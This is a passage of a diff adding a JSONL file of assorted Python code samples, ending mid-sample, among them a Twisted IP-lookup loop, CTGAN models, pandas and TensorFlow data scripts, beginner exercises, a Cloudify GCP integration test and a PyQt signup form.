diff --git "a/4458.jsonl" "b/4458.jsonl" new file mode 100644--- /dev/null +++ "b/4458.jsonl" @@ -0,0 +1,626 @@ +{"seq_id":"351890824","text":"from twisted.internet import reactor\nfrom twisted.internet.task import react\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.web.client import Agent\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet.defer import returnValue\n\nfrom tubing.source import Source\nfrom tubing.sink import LoopingSink\nfrom tubing.tube import tube\nfrom tubing.visual import dump\nfrom tubing.tlogging import log\n\nfrom treq import get\nfrom json import loads\n\n@tube\nclass RequestTube(object):\n \"\"\"Deferred generator for our Source\"\"\"\n def received(self, _):\n page = get('https://api.ipify.org?format=json')\n return page\n\n@tube\nclass DataTube(object):\n \"\"\"Yield from the request and return the data\"\"\"\n @inlineCallbacks\n def received(self, page):\n req = yield page\n data = yield req.text()\n return data\n\n@tube\nclass ParseTube(object):\n \"\"\"Get the ip from the data\"\"\"\n def received(self, data):\n return loads(data)['ip']\n\nclass IPSink(LoopingSink):\n \"\"\"Show the ip\"\"\"\n def received(self, ip):\n print('Your ip is: %s' % ip)\n\ndef retry(error, source, _):\n log('Network Error', 'Treq request failed. Retrying..')\n source.deferredReceived()\n\n@inlineCallbacks\ndef main(reactor):\n\n source = Source()\n series = (DataTube(), ParseTube())\n sink = IPSink(source = source, delay = 5)\n\n source.flowFrom(RequestTube())\n source.flowTo(series).flowTo(sink)\n source.flowFailed(retry, args=[])\n source.deferredReceived()\n\n dump(source, series, sink)\n\n yield Deferred()\n\nif __name__ == '__main__':\n react(main)\n","sub_path":"deferred_loop_example.py","file_name":"deferred_loop_example.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452978347","text":"import torch\nfrom torch.nn import BatchNorm1d, Dropout, LeakyReLU, Linear, Module, ReLU, Sequential\nfrom ctgan.config import ctgan_setting as cfg\n\n\nclass Discriminator(Module):\n # Note: The lambda_ is based on WGAN + gradient penalty.\n # See Algorithm 1 in Gulrajani et. al. (2017)\n def calc_gradient_penalty(self, real_data, fake_data, device='cpu', pac=10, lambda_=10):\n # real_data.size(0) is batch size, eg. 500\n # real_data.size(1) is number of columns, eg. 15\n alpha = torch.rand(real_data.size(0) // pac, 1, 1, device=device) # eg. ([50, 1, 1])\n # duplicates alpha. For each alpha, # cols is real_data.size(1), # rows is pac.\n alpha = alpha.repeat(1, pac, real_data.size(1)) # eg. [(50, 10 , 15)]\n # change shape so that alpha is the same dimension as real_data and fake_data.\n alpha = alpha.view(-1, real_data.size(1)) # eg[(500, 15)]\n\n # Element-wise multiplication.\n # real_data.shape == fake_data.shape == interpolates.shape == eg. ([500, 15])\n # Note: See section 4 of Gulrajani et. al. (2017), Sampling distribution\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n # Note interpolates passes through the Discriminator forward function.\n disc_interpolates = self(interpolates) # disc_interpolates.shape == eg. ([50, 1])\n\n # Computes and returns the sum of gradients of outputs w.r.t. 
the inputs.\n gradients = torch.autograd.grad(\n outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=torch.ones(disc_interpolates.size(), device=device),\n create_graph=True, retain_graph=True, only_inputs=True\n )[0]\n\n # gradients.shape == [(500, 15)]\n gradient_penalty = ((\n # reshape to pac * real_data.size(1) sums all\n # the norm is a Frobenius norm.\n # It sums over all interpolates/gradients multiplied to same alpha previously.\n gradients.view(-1, pac * real_data.size(1)).norm(2, dim=1) - 1\n ) ** 2).mean() * lambda_\n return gradient_penalty\n\n def __init__(self, input_dim, dis_dims, pack=10):\n super(Discriminator, self).__init__()\n dim = input_dim * pack\n self.pack = pack\n self.packdim = dim\n seq = []\n print('Dropout rate: ', cfg.DROPOUT)\n for item in list(dis_dims):\n #seq += [Linear(dim, item), LeakyReLU(0.2), Dropout(0.5)]\n seq += [Linear(dim, item), LeakyReLU(0.2), Dropout(cfg.DROPOUT)]\n dim = item\n\n seq += [Linear(dim, 1)]\n self.seq = Sequential(*seq)\n\n def forward(self, input):\n # NOTE: disable assert so that model_summary can be printed.\n # this is because batch_size of input x is hardcoded in torchsummary.py.\n # See row 60 of torchsummary.py in torchsummary library\n # See also if model_summary in synthesizer.py\n # instead, this is imposed in synthesizer.py instead.\n # See assert self.batch_size % self.pack == 0.\n # assert input.size()[0] % self.pack == 0\n\n # input.view reshapes the input data by dividing the 1st dim, i.e. batch size\n # and group the data in concatenate manner in 2nd dim\n # example, if input dim is ([500, 15]) and pack is 10,\n # then it is reshaped to ([500/10, 15*10)] = ([50, 150])\n return self.seq(input.view(-1, self.packdim))\n\n\nclass Residual(Module):\n # NOTE: a Residual layer will be created for each one of the values in gen_dims provided\n def __init__(self, i, o):\n super(Residual, self).__init__()\n self.fc = Linear(i, o)\n self.bn = BatchNorm1d(o)\n self.relu = ReLU()\n\n def forward(self, input):\n out = self.fc(input)\n out = self.bn(out)\n out = self.relu(out)\n # concatenate the columns. See 4.4 of Xu et. 
al (2019),\n # where h2 concat h1 concat h0 before passing through last FCs to generate alpha, beta and d.\n return torch.cat([out, input], dim=1)\n\n\nclass Generator(Module):\n def __init__(self, embedding_dim, gen_dims, data_dim):\n super(Generator, self).__init__()\n dim = embedding_dim\n seq = []\n for item in list(gen_dims):\n seq += [Residual(dim, item)]\n dim += item\n seq.append(Linear(dim, data_dim))\n self.seq = Sequential(*seq)\n\n def forward(self, input):\n data = self.seq(input)\n return data\n","sub_path":"ctgan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357331325","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/bouma/gitprojects/provgroningen/buildout/src/djinn_i18n/djinn_i18n/views/po.py\n# Compiled at: 2014-08-22 05:05:49\nimport json, polib\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom djinn_i18n.tool import TOOL\n\nclass EntryEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, polib.POEntry):\n return {'msgid': obj.msgid, 'msgstr': obj.msgstr, \n 'comment': obj.comment, \n 'tcomment': obj.tcomment}\n return json.JSONEncoder.default(self, obj)\n\n\nclass POView(View):\n\n @property\n def locale(self):\n return self.kwargs.get('locale')\n\n def get(self, request, *args, **kwargs):\n entries = TOOL.get_entries(self.locale)\n return HttpResponse(json.dumps(entries, skipkeys=True, cls=EntryEncoder), content_type='application/json')","sub_path":"pycfiles/djinn_i18n-1.0.8.tar/po.py","file_name":"po.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"134249259","text":"import pandas as pd\n\ndef main():\n df = pd.read_csv('InterpolatedWithCAPEX2.csv')\n df_N = pd.read_csv('InterpolatedNum.csv')\n max_D = {'D REVENUE':df['D REVENUE'].max(), 'U CR':df['U CR'].max(), 'D OE':df['D OE'].max(), \n 'D NOI':df['D NOI'].max(),'U CAPEX':df['U CAPEX'].max(), 'U CWK':df['U CWK'].max()} \n min_D = {'D REVENUE':df['D REVENUE'].min(), 'U CR':df['U CR'].min(), 'D OE':df['D OE'].min(), \n 'D NOI':df['D NOI'].min(),'U CAPEX':df['U CAPEX'].min(), 'U CWK':df['U CWK'].min()}\n max_N = {'U REVENUE':df_N['U REVENUE'].max(), 'D CR':df_N['D CR'].max(), 'U OE':df_N['U OE'].max(), \n 'U NOI':df_N['U NOI'].max(),'D CAPEX':df_N['D CAPEX'].max(), 'D CWK':df_N['D CWK'].max()} \n min_N = {'U REVENUE':df_N['U REVENUE'].min(), 'D CR':df_N['D CR'].min(), 'U OE':df_N['U OE'].min(), \n 'U NOI':df_N['U NOI'].min(),'D CAPEX':df_N['D CAPEX'].min(), 'D CWK':df_N['D CWK'].min()}\n \n filas_d, columnas_d = df.count()-1, len(df.columns)-1\n dataset_D = df.values\n #Variables a pasar a la funcion generate_population\n d_fcf = dataset_D[filas_d, columnas_d][1]\n filas_n, columnas_n = df_N.count()-1, len(df_N.columns)-1\n dataset_N = df_N.values\n u_fcf = dataset_N[filas_d, columnas_d][1]\n ##Falta idear una forma en la que se pueda pasar u_fcf y d_fcf a apply function que no se por parametro\n\n ##Calculo de las x\n x1 = df_N['U REVENUE'].corr(df_N['U FCF'])\n x2 = df_N['D CR'].corr(df_N['U FCF'])\n x3 = df_N['U OE'].corr(df_N['U FCF'])\n x4 = df_N['U NOI'].corr(df_N['U FCF'])\n x5 = df_N['D CAPEX'].corr(df_N['U FCF'])\n x6 = df_N['D CWK'].corr(df_N['U FCF'])\n x7 = df['D REVENUE'].corr(df['D FCF'])\n x8 
= df['U CR'].corr(df['D FCF'])\n x9 = df['D OE'].corr(df['D FCF'])\n x10 = df['D NOI'].corr(df['D FCF'])\n x11 = df['U CAPEX'].corr(df['D FCF'])\n x12 = df['U CWK'].corr(df['D FCF'])\n\n print(u_fcf)\n\n\n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"Combination/neuralnetwork.py","file_name":"neuralnetwork.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580024509","text":"\"\"\"Build rejection tables with metric information.\n\nThis script will create tables listing the confusion table metrics,\nsensitivity and specificity at different rejection thresholds. Also\nincluded is the percentage of samples which are rejected in each\nthreshold.\nA seperate table will be created for each model and species-antibiotic \nscenario.\n\"\"\"\n\n\nimport argparse\nimport collections\nimport json\nimport os\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\n\nimport numpy as np\nimport pandas as pd\n\nfrom tqdm import tqdm\n\nfrom maldi_learn.metrics import specificity_score\nfrom maldi_learn.metrics import sensitivity_score\nfrom utilities import _encode\n\n# Global metadata information; this will be updated by the script to\n# ensure that we are working with data files from the *same* sources\n# in order to create curves.\nmetadata_versions = {}\n\ndef _add_or_compare(metadata):\n if not metadata_versions:\n metadata_versions.update(metadata)\n else:\n # Smarter way to compare the entries of the dictionaries with\n # each other.\n assert metadata_versions == metadata\n\n\ndef calc_metrics_for_rejection_threshold(y_true, y_score, threshold):\n \"\"\"Calculate metrics for a certain rejection threshold.\n\n This function simulates a rejection scenario based on prediction\n scores for a given classifier. To this end, potential probability\n thresholds are generated and the classifier is simulated with the\n corresponding rejection rate.\n\n Parameters\n ----------\n y_true : `numpy.array` or `list`\n True labels\n\n y_score : `numpy.array` or `list`\n Classifier prediction scores\n\n threshold: `int`\n Rejection threshold. All samples with a predicted max class\n probability below this threshold will be discarded.\n\n Returns\n -------\n Pandas dataframe with all metrics, rejection threshold and rejection\n percentage as columns.\n \"\"\"\n # Determine maximum class probability to apply threshold cut-off\n # on both classes. \n y_score_max = np.amax(y_score, axis=1)\n n_samples = len(y_score_max)\n minority_class = np.argmin(np.bincount(y_true))\n\n # Get the indices that we want to *keep*, i.e. 
those test\n # samples whose maximum probability exceeds the threshold\n indices = y_score_max > threshold\n\n # Subset the predictions and the labels according to these\n # indices and calculate the desired metrics.\n y_true_ = y_true[indices]\n y_pred_proba_ = y_score[indices][:, minority_class]\n\n # Predict the positive class if the prediction threshold is\n # larger than the one we use for this iteration.\n y_pred = np.zeros_like(y_pred_proba_)\n y_pred[y_pred_proba_ > threshold] = 1.0\n\n # Ensures that we are working with the proper scenario here;\n # we need two different classes to perform the calculation.\n if len(set(y_true_)) != 2:\n return None\n \n # Calculate percentage of rejected samples \n n_rejected = len(y_true) - len(y_true_) \n percentage_rejected = round(n_rejected / n_samples, 5)\n\n\n # Calculate confusion matrix\n TN, FP, FN, TP = confusion_matrix(y_true_, \n y_pred,\n labels=[0,1]\n ).ravel() \n\n # Calculate metrics\n average_precision = average_precision_score(y_true_, y_pred_proba_)\n accuracy = accuracy_score(y_true_, y_pred)\n roc_auc = roc_auc_score(y_true_, y_pred_proba_)\n specificity = round(specificity_score(y_true_, y_pred), 5)\n sensitivity = round(sensitivity_score(y_true_, y_pred), 5)\n\n # Convert into pd.DataFrame format for appending the overall\n # dataframe \n row = pd.DataFrame({\n 'threshold': [threshold],\n 'percentage rejected samples': [percentage_rejected],\n 'specificity': [specificity],\n 'sensitivity': [sensitivity],\n 'TP': [TP],\n 'FP': [FP],\n 'TN': [TN],\n 'FN': [FN],\n })\n\n return row\n\n\ndef build_rejection_table(df, outdir, curve_type='calibrated'):\n \"\"\"Contruct table with different rejection threshold in each row.\n\n This function simulates different rejection scenarios based on the\n classifier scores. Each line represents the metrics and percentage\n of rejected samples for a different rejection ratio.\n\n Parameters\n ----------\n df : `pandas.DataFrame`\n TBD\n\n outdir : str\n Output directory; this is where the plots will be stored.\n \n curve_type : str\n Type of classifier, either `calibrated` or `raw`.\n\n Returns\n -------\n Nothing. As a side-effect of calling this function, tables will be\n generated.\n \"\"\"\n\n thresholds = np.linspace(0.5, 1.0, 21)\n\n # The way the data are handed over to this function, there is only\n # a single model.\n model = df.model.unique()[0]\n\n for (species, antibiotic), df_ in df.groupby(['species', 'antibiotic']):\n table_df = pd.DataFrame()\n\n y_test = np.vstack(df_['y_test']).ravel()\n y_score = np.vstack(df_['y_score'])\n y_score_calibrated = np.vstack(df_['y_score_calibrated'])\n\n for threshold in thresholds:\n\n if curve_type=='calibrated':\n row = calc_metrics_for_rejection_threshold(\n y_test, y_score_calibrated, threshold\n )\n\n else:\n row = calc_metrics_for_rejection_threshold(\n y_test, y_score, threshold\n )\n \n if row is not None:\n table_df = table_df.append(row)\n \n print(table_df)\n filename = (\n f'Rejection_table_' +\n f'{species}_{antibiotic}_' + \n f'{curve_type}_{model}.csv'\n )\n table_df.to_csv(\n os.path.join(outdir, filename),\n index=False\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('INPUT', type=str, help='Input directory')\n parser.add_argument(\n '--outdir',\n type=str,\n default='.',\n help='Output directory'\n )\n\n args = parser.parse_args()\n\n # Stores data rows corresponding to individual scenarios. 
Each\n # scenario involves the same model (plus multiple antibiotics,\n # or species, combinations).\n scenarios = collections.defaultdict(list)\n\n # Keys to skip when creating a single row in the data dictionary\n # above. This ensures that we only add single pieces of data and\n # have an easier time turning every scenario into a data frame.\n skip_keys = ['years', 'metadata_versions']\n\n # Contains the combinations of species--antibiotic that we want to\n # plot in the end. Anything else is ignored.\n selected_combinations = [\n ('Escherichia coli', 'Cefepime'),\n ('Klebsiella pneumoniae', 'Ceftriaxone'),\n ('Staphylococcus aureus', 'Oxacillin')\n ]\n\n files_to_load = []\n for root, dirs, files in os.walk(args.INPUT):\n files_to_load.extend([\n os.path.join(root, fn) for fn in files if\n os.path.splitext(fn)[1] == '.json'\n ])\n\n for filename in tqdm(files_to_load, desc='File'):\n\n with open(filename) as f:\n data = json.load(f)\n\n antibiotic = data['antibiotic']\n species = data['species']\n model = data['model']\n\n if (species, antibiotic) not in selected_combinations:\n continue\n\n _add_or_compare(data['metadata_versions'])\n\n row = {\n key: data[key] for key in data.keys() if key not in skip_keys\n }\n\n basename = os.path.basename(filename)\n\n scenarios[model].append(row)\n\n for model in sorted(scenarios.keys()):\n\n rows = scenarios[model]\n df = pd.DataFrame.from_records(rows)\n\n build_rejection_table(df, args.outdir)\n","sub_path":"amr_maldi_ml/building/deprecated/build_table2_rejection.py","file_name":"build_table2_rejection.py","file_ext":"py","file_size_in_byte":8027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410831944","text":"# 1\nname = input(\"What is your name? >> \")\nprint(\"Hello, \" + name + \"!\")\n\n# 2\nlength_name = len(name)\nupper_name = name.upper()\n\nprint(\"YOUR NAME HAS\", length_name, \"letters in it, that's pretty dang cool!\".upper())\n\n# 3\nsubject = input(\"What is your favorite subject? >> \")\nmadlib = \"%s's favorite subject in school is %s\"%(name, subject)\nprint(madlib)\n\n# 4\nday = int(input(\"Day (0-6)? >> \"))\n\nif day == 0:\n print(\"Sunday\")\nif day == 1:\n print(\"Monday\")\nif day == 2:\n print(\"Tuesday\")\nif day == 3:\n print(\"Wednesday\")\nif day == 4:\n print(\"Thursday\")\nif day == 5:\n print(\"Friday\")\nif day == 6:\n print(\"Saturday\")\nif day > 6:\n print(\"You did not input a number ranging from 0-6; please try again.\")\n\n# 5\n\nif day == 0:\n print(\"Sleep in, you've earned it\")\nif day == 1:\n print(\"Go to work, you lazy bum!\")\nif day == 2:\n print(\"Go to work, you lazy bum!\")\nif day == 3:\n print(\"Go to work, you lazy bum!\")\nif day == 4:\n print(\"Go to work, you lazy bum!\")\nif day == 5:\n print(\"Go to work, you lazy bum!\")\nif day == 6:\n print(\"Sleep in, you've earned it\")\n\n# 6\ntemp = int(input(\"Temperature in Celsius? >> \"))\ntemp = temp * 1.8 + 32\n\nprint(temp)\n\n# 7\nbill = int(input(\"How much was your bill? >> \"))\nserv = (input(\"How do you rate the serivce you've recieved? 
(Good, Fair, or Poor) >> \"))\n\"{:.2f}\".format(bill)\ng = bill + bill * .2\nf = bill + bill * .15\np = bill + bill * .1\n\nif serv == \"Good\":\n bill = bill + bill * .2\n print(\"Your total with tip is\", bill)\nif serv == \"Fair\":\n bill = bill + bill * .15\n print(\"Your total with tip is\", bill)\nif serv == \"Poor\":\n bill = bill + bill *.1\n print(\"Your total with tip is\", bill)\n\n# 8\nper = int(input(\"How many ways are we splitting the bill today? >> \"))\nbill = bill / per\nprint(\"The amount per person comes out to\", bill)\n\n# 9\nn = 0\nwhile n < 10:\n n += 1\n print(\"The count is\", n)\n\n# 10\ncoins = 0\nprint(\"You currently have\", coins, \" coins.\")\nblank = input(\"Would you be interested in another? (Yes, or No) >> \")\nwhile blank == \"Yes\":\n coins += 1\n print(\"You currently have\", coins, \" coins.\")\n blank = input(\"Would you be interested in another? (Yes, or No) >> \")\nelse:\n print(\"Okay, Mario. Have a good day!\")\n\n\n","sub_path":"exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331858808","text":"#coding=utf-8\n__author__ = 'Michal Petrovič'\n\nfrom comtypes.client import *\n\n\nclass ComtypesReader:\n\n def __init__(self, file_path):\n com_object = CreateObject(\"DAO.DBEngine.36\")\n self.database = com_object.OpenDatabase(file_path)\n\n def get_item(self, table_name, column_name, conditions):\n num_rows = self.get_num_rows(table_name, conditions)\n if num_rows != 0:\n rs = self.database.OpenRecordset(\"SELECT \" + column_name + \" FROM \" + table_name + \" WHERE \" + conditions)\n return rs.Fields(0).Value\n else:\n return None\n\n def get_items(self, table_name, columns, conditions):\n num_rows = self.get_num_rows(table_name, conditions)\n\n rs = self.database.OpenRecordset(\"SELECT \" + columns + \" FROM \" + table_name + \" WHERE \" + conditions)\n num_col = rs.Fields.Count\n table = [[None for _ in range(num_col)] for _ in range(num_rows)]\n\n for a in range(num_rows):\n for b in range(num_col):\n table[a][b] = rs.Fields(b).Value\n rs.MoveNext()\n\n return table\n\n def get_num_rows(self, table_name, conditions=None):\n if conditions is None:\n rs = self.database.OpenRecordset(\"SELECT COUNT(*) FROM \" + table_name)\n return rs.Fields(0).Value\n else:\n rs = self.database.OpenRecordset(\"SELECT COUNT(*) FROM \" + table_name + \" WHERE \" + conditions)\n return rs.Fields(0).Value\n\n def get_table(self, table_name):\n rs = self.database.OpenRecordset(\"SELECT * FROM \" + table_name)\n x = self.get_num_rows(table_name)\n y = rs.Fields.Count\n table = [[None for _ in range(y)] for _ in range(x)]\n\n for a in range(x):\n for b in range(y):\n table[a][b] = rs.Fields(b).Value\n rs.MoveNext()\n\n return table","sub_path":"plugin/comtypesReader.py","file_name":"comtypesReader.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96693754","text":"import unicodecsv as csv\n\nfrom app import create_app\nfrom app.models import Disclosure\n\napp = create_app()\n\nwith open('democratic senate.csv', 'rb') as fh:\n reader = csv.reader(fh)\n for row in reader:\n # Normalize first names\n contributor = row[1]\n contributor = contributor.split(', ')\n if len(contributor) > 1:\n contributor.append(contributor.pop(0))\n contributor = ' '.join(contributor)\n row[1] = contributor\n Disclosure.to_csv(row[1:], 
filename=row[0])\n","sub_path":"senate.py","file_name":"senate.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"217047345","text":"from __future__ import print_function\nimport math\nfrom IPython import display\nfrom matplotlib import cm\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\n\ncalifornia_housing_dataframe = pd.read_csv(\"california_housing.csv\")\n\n\n# 获取特征\ndef preprocess_features(california_housing_dataframe):\n selected_features = california_housing_dataframe[\n [\"latitude\",\n \"longitude\",\n \"housing_median_age\",\n \"total_rooms\",\n \"total_bedrooms\",\n \"population\",\n \"households\",\n \"median_income\"]]\n processed_features = selected_features.copy()\n processed_features[\"rooms_per_person\"] = (\n california_housing_dataframe[\"total_rooms\"] / california_housing_dataframe[\"population\"]\n )\n return processed_features\n\n\n# 获取median_house_value\ndef preprocess_targets(california_housing_dataframe):\n output_targets = pd.DataFrame()\n # 取出median_house_value 并缩放median_house_value返回\n output_targets[\"median_house_value\"] = (california_housing_dataframe[\"median_house_value\"] / 1000.0)\n return output_targets\n\n\ndef splitData():\n # 将数据拆分 训练数据,验证数据\n training_examples = preprocess_features(california_housing_dataframe.head(12000))\n training_targets = preprocess_targets(california_housing_dataframe.head(12000))\n\n validation_examples = preprocess_features(california_housing_dataframe.tail(5000))\n validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))\n\n # correlation_dataframe = training_examples.copy()\n # correlation_dataframe[\"target\"] = training_targets[\"median_house_value\"]\n #\n # print(correlation_dataframe.corr())\n\n # print(\"Training examples summary:\")\n # display.display(training_examples.describe())\n # print(\"Validation examples summary:\")\n # display.display(validation_examples.describe())\n #\n # print(\"Training targets summary:\")\n # display.display(training_targets.describe())\n # print(\"Validation targets summary:\")\n # display.display(validation_targets.describe())\n\n\ndef construct_feature_columns(input_features):\n # set = set([tf.feature_column.numeric_column(my_feature)\n # for my_feature in input_features])\n # print(set)\n return set([tf.feature_column.numeric_column(my_feature)\n for my_feature in input_features])\n\n\ndef my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):\n features = {key: np.array(value) for key, value in dict(features).items()}\n ds = Dataset.from_tensor_slices((features, targets))\n ds = ds.batch(batch_size).repeat(num_epochs)\n if shuffle:\n ds = ds.shuffle(10000)\n\n features, labels = ds.make_one_shot_iterator().get_next()\n\n return features, labels\n\n\ndef train_model(learning_rate, steps, batch_size, training_examples,\n training_targets, validation_examples, validation_targets\n ):\n periods = 50\n steps_per_period = steps / periods\n\n # 梯度优化\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\n # 创建线性回归模型\n linear_regressor = tf.estimator.LinearRegressor(feature_columns=construct_feature_columns(training_examples),\n optimizer=my_optimizer)\n\n # 创建输入函数\n 
training_input_fn = lambda: my_input_fn(training_examples, training_targets[\"median_house_value\"],\n batch_size=batch_size)\n\n predict_training_input_fn = lambda: my_input_fn(training_examples,\n training_targets[\"median_house_value\"],\n num_epochs=1,\n shuffle=False)\n predict_validation_input_fn = lambda: my_input_fn(validation_examples,\n validation_targets[\"median_house_value\"],\n num_epochs=1,\n shuffle=False)\n print(\"Training model...\")\n print(\"RMSE (on training data):\")\n training_rmse = []\n validation_rmse = []\n for period in range(0, periods):\n # 训练模型\n linear_regressor.train(input_fn=training_input_fn, steps=steps_per_period)\n # 使用模型对预测数据集进行预测\n training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)\n # 获取预测结果\n training_predictions = np.array([item['predictions'][0] for item in training_predictions])\n print(\"training_predictions\",training_predictions)\n\n # 使用模型对验证数据集进行验证\n validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)\n #获取预测结果\n validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])\n print(\"validation_predictions\",validation_predictions)\n\n # 计算训练和验证的损失 -- 均方根误差\n training_root_mean_squared_error = math.sqrt(metrics.mean_squared_error(training_predictions, training_targets))\n print(\"training_root_mean_squared_error\",training_root_mean_squared_error)\n\n validation_root_mean_squared_error = math.sqrt(\n metrics.mean_squared_error(validation_predictions, validation_targets))\n print(\" period %02d : %0.2f\" % (period, training_root_mean_squared_error))\n #添加均方根误差\n training_rmse.append(training_root_mean_squared_error)\n validation_rmse.append(validation_root_mean_squared_error)\n\n print(\"Model training finished.\")\n # Output a graph of loss metrics over periods.\n plt.ylabel(\"RMSE\")\n plt.xlabel(\"Periods\")\n plt.title(\"Root Mean Squared Error vs. Periods\")\n plt.tight_layout()\n plt.plot(training_rmse, label=\"training\")\n plt.plot(validation_rmse, label=\"validation\")\n plt.show()\n\n return linear_regressor\n\nif __name__ == '__main__':\n training_examples = preprocess_features(california_housing_dataframe.head(12000))\n training_targets = preprocess_targets(california_housing_dataframe.head(12000))\n\n validation_examples = preprocess_features(california_housing_dataframe.tail(5000))\n validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))\n\n minimal_features = [\n \"median_income\",\n \"latitude\",\n ]\n\n minimal_training_examples = training_examples[minimal_features]\n minimal_validation_examples = validation_examples[minimal_features]\n\n _ = train_model(\n learning_rate=0.01,\n steps=500,\n batch_size=5,\n training_examples=minimal_training_examples,\n training_targets=training_targets,\n validation_examples=minimal_validation_examples,\n validation_targets=validation_targets)\n\n","sub_path":"beginLearn/ten/google.tensorflow/p4/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"143242166","text":"# #######\n# Copyright (c) 2019 Cloudify Platform Ltd. 
All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom random import random\n\nfrom integration_tests.tests.test_cases import PluginsTest\n\nPLUGIN_NAME = 'cloudify-azure-plugin'\nDEVELOPMENT_ROOT = os.path.abspath(\n os.path.join(os.path.dirname(\n os.path.realpath(__file__)), '../..'))\nTEST_KEY_PATH = '/tmp/foo.rsa'\nTEST_PUB_PATH = '/tmp/foo.rsa.pub'\nGCP_KEY_PATH = '/tmp/gcp_private_key'\ntest_id = '{0}{1}'.format(\n os.getenv('CIRCLE_JOB', 'cfy'),\n os.getenv('CIRCLE_BUILD_NUM', str(random())[-4:-1])\n)\n\n\nclass GCPPluginTestCase(PluginsTest):\n\n base_path = os.path.dirname(os.path.realpath(__file__))\n\n @property\n def plugin_root_directory(self):\n return os.path.abspath(os.path.join(self.base_path, '..'))\n\n @property\n def inputs(self):\n return {\n 'region': os.getenv('gcp_region'),\n 'network_name': '{0}network'.format(test_id),\n 'subnet_name': '{0}subnet'.format(test_id)\n }\n\n def create_secrets(self):\n secrets = {\n 'agent_key_private': os.getenv('agent_key_private',\n open(TEST_KEY_PATH).read()),\n 'agent_key_public': os.getenv('agent_key_public',\n open(TEST_PUB_PATH).read()),\n 'gcp_region': os.getenv('gcp_region'),\n 'gcp_zone': os.getenv('gcp_zone'),\n 'gcp_private_key': open(GCP_KEY_PATH).read(),\n 'gcp_private_key_id': os.getenv('gcp_private_key_id'),\n 'gcp_project_id': os.getenv('gcp_project_id'),\n 'gcp_client_id': os.getenv('gcp_client_id'),\n 'gcp_client_email': os.getenv('gcp_client_email'),\n 'gcp_client_x509_cert_url': os.getenv('gcp_client_x509_cert_url'),\n }\n self._create_secrets(secrets)\n\n def upload_plugins(self):\n self.upload_mock_plugin(\n PLUGIN_NAME, self.plugin_root_directory)\n self.upload_mock_plugin(\n 'cloudify-utilities-plugin',\n os.path.join(DEVELOPMENT_ROOT, 'cloudify-utilities-plugin'))\n self.upload_mock_plugin(\n 'cloudify-ansible-plugin',\n os.path.join(DEVELOPMENT_ROOT, 'cloudify-ansible-plugin'))\n\n def test_blueprints(self):\n self.upload_plugins()\n self.create_secrets()\n self.check_hello_world_blueprint('gcp', self.inputs, 400)\n self.check_db_lb_app_blueprint(\n 'gcp', 800,\n {\n 'resource_prefix': 'dblbapp',\n 'resource_suffix': test_id\n }\n )\n","sub_path":".cicd/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260678994","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtGui import QIcon\r\nfrom Options import customer_signup, seller_signup\r\n\r\nclass Ui_SignupPanel(object):\r\n def setupUi(self, SignupPanel):\r\n SignupPanel.setObjectName(\"SignupPanel\")\r\n SignupPanel.resize(800, 643)\r\n self.centralwidget = QtWidgets.QWidget(SignupPanel)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.Customeradd_btn = 